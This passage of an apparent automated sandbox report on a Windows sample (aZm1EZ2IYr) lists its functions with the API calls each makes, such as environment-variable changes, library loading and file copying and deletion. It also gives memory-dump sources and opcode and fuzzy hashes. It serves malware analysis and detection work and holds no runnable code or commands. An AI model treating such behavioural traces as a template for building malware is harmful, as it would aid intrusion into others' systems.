                                                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(003DEF20,0000FFFF,?,?,?,?,?,?,?,?,?,?,0018DADF), ref: 001883F7
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 0019051E: lstrlenA.KERNEL32(?,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190524
                                                                                                                                                                          • Part of subcall function 0019051E: lstrcpyA.KERNEL32(00000000,00000000,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190556
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • SetEnvironmentVariableA.KERNEL32(?,001B7194,003DEF20,001B674E,?,?,?,?,?,?,?,?,0018DADF), ref: 0018844C
                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0018DADF), ref: 00188460
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                        • String ID: =
                                                                                                                                                                        • API String ID: 2929475105-1325313214
                                                                                                                                                                        • Opcode ID: 05f32d0ae2f63027382745c0d61484ec7e861fd2e108e8bbb6cfca944e6dce70
                                                                                                                                                                        • Instruction ID: 1af8eef68d2c1b8d0a20f5e8a22a1e82ec57877fc026fce3fe7e7dc76d66320b
                                                                                                                                                                        • Opcode Fuzzy Hash: 05f32d0ae2f63027382745c0d61484ec7e861fd2e108e8bbb6cfca944e6dce70
                                                                                                                                                                        • Instruction Fuzzy Hash: 6D314775A02524AFCB13BF68FC424ADBFB9EB59700F554127E510AB271DB31AA42CF81
                                                                                                                                                                        Function 00196E08 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00196E0F
                                                                                                                                                                        • lstrlenA.KERNEL32(?,0000001C), ref: 00196E1A
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00196E9E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: H_prolog3_catchlstrlen
                                                                                                                                                                        • String ID: ERROR
                                                                                                                                                                        • API String ID: 591506033-2861137601
                                                                                                                                                                        • Opcode ID: b6e2925a3ac8d851b6e4a9f3910d44fa8293ac727937d6ebe482e520607b1b69
                                                                                                                                                                        • Instruction ID: c6b2c51a267e3cb58b08b3e46d1ade6f8cbae651fb0f1097cdc61e1bccc6a27d
                                                                                                                                                                        • Opcode Fuzzy Hash: b6e2925a3ac8d851b6e4a9f3910d44fa8293ac727937d6ebe482e520607b1b69
                                                                                                                                                                        • Instruction Fuzzy Hash: 7E11467190050ADFCB52FFB4D942A9DBBB5BF28310B504136E814E7561EB35AEA58FC0
                                                                                                                                                                        Function 0018F252 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0018F257
                                                                                                                                                                          • Part of subcall function 001AEC48: std::exception::exception.LIBCMT ref: 001AEC5D
                                                                                                                                                                          • Part of subcall function 001AEC48: __CxxThrowException@8.LIBCMT ref: 001AEC72
                                                                                                                                                                          • Part of subcall function 001AEC48: std::exception::exception.LIBCMT ref: 001AEC83
                                                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0018F262
                                                                                                                                                                          • Part of subcall function 001AEC95: std::exception::exception.LIBCMT ref: 001AECAA
                                                                                                                                                                          • Part of subcall function 001AEC95: __CxxThrowException@8.LIBCMT ref: 001AECBF
                                                                                                                                                                          • Part of subcall function 001AEC95: std::exception::exception.LIBCMT ref: 001AECD0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 1823113695-4289949731
                                                                                                                                                                        • Opcode ID: 4adb2d02b3ae3adf22c3253d8216d79d6ea51e6df87e1860d2719cb863d3b16d
                                                                                                                                                                        • Instruction ID: b66cd6122de4eeea9b451dd909569ea20da11bce9821ebad8239f2c0fb3b89fc
                                                                                                                                                                        • Opcode Fuzzy Hash: 4adb2d02b3ae3adf22c3253d8216d79d6ea51e6df87e1860d2719cb863d3b16d
                                                                                                                                                                        • Instruction Fuzzy Hash: FBD012B590020C7BCB04E799D8069DDBAE99F55711F100169F605D3645EBB067004565
                                                                                                                                                                        Function 00191D36 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001922D6,?), ref: 00191D41
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00191D48
                                                                                                                                                                        • wsprintfW.USER32 ref: 00191D59
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                        • String ID: %hs
                                                                                                                                                                        • API String ID: 659108358-2783943728
                                                                                                                                                                        • Opcode ID: 32010abb20970528cf78c92a0c0a87196f52a1d42b7284e17ecd4ac4ac321324
                                                                                                                                                                        • Instruction ID: 9e0bc5ea69c52794822b6c3be33a87b06bee783ebd4d359328103772d205125a
                                                                                                                                                                        • Opcode Fuzzy Hash: 32010abb20970528cf78c92a0c0a87196f52a1d42b7284e17ecd4ac4ac321324
                                                                                                                                                                        • Instruction Fuzzy Hash: 27D05E3234431477C61127D4AC0DB9A3B18DB096E2F000120FA0D95690DB65449447D5
                                                                                                                                                                        Function 001813F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00181402
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0018140D
                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00181416
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CapsCreateDeviceRelease
                                                                                                                                                                        • String ID: DISPLAY
                                                                                                                                                                        • API String ID: 1843228801-865373369
                                                                                                                                                                        • Opcode ID: 89af4188b52c2dac8b5b6b493c584c14fefa571eb07e5c5ad77b1bd42511a4c2
                                                                                                                                                                        • Instruction ID: 48f3a2fc5024b239d427aa81570549c51b2910955093c0adc9d921189b71ce2c
                                                                                                                                                                        • Opcode Fuzzy Hash: 89af4188b52c2dac8b5b6b493c584c14fefa571eb07e5c5ad77b1bd42511a4c2
                                                                                                                                                                        • Instruction Fuzzy Hash: 34D012353C430477E1712762BC0EF5B2924D7C9F42F200104F302695D047B014829636
                                                                                                                                                                        Function 0018AFF6 Relevance: 6.2, APIs: 4, Instructions: 222filestringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0018B09B
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0018B251
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0018B26C
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0018B2BE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 211194620-0
                                                                                                                                                                        • Opcode ID: 2c7e6be51f161c674b44ca3c6a66302450a20266393f642e04d6fab2b37948e7
                                                                                                                                                                        • Instruction ID: f35b51552af13006a05e96d6c572f72530c2f7a47290ea4fadf2b59124ef91d4
                                                                                                                                                                        • Opcode Fuzzy Hash: 2c7e6be51f161c674b44ca3c6a66302450a20266393f642e04d6fab2b37948e7
                                                                                                                                                                        • Instruction Fuzzy Hash: FB819032D001299BDF02FBA4ED469DDBBB5EF29305F624061F910B7162DB70AE468F91
                                                                                                                                                                        Function 0018B307 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
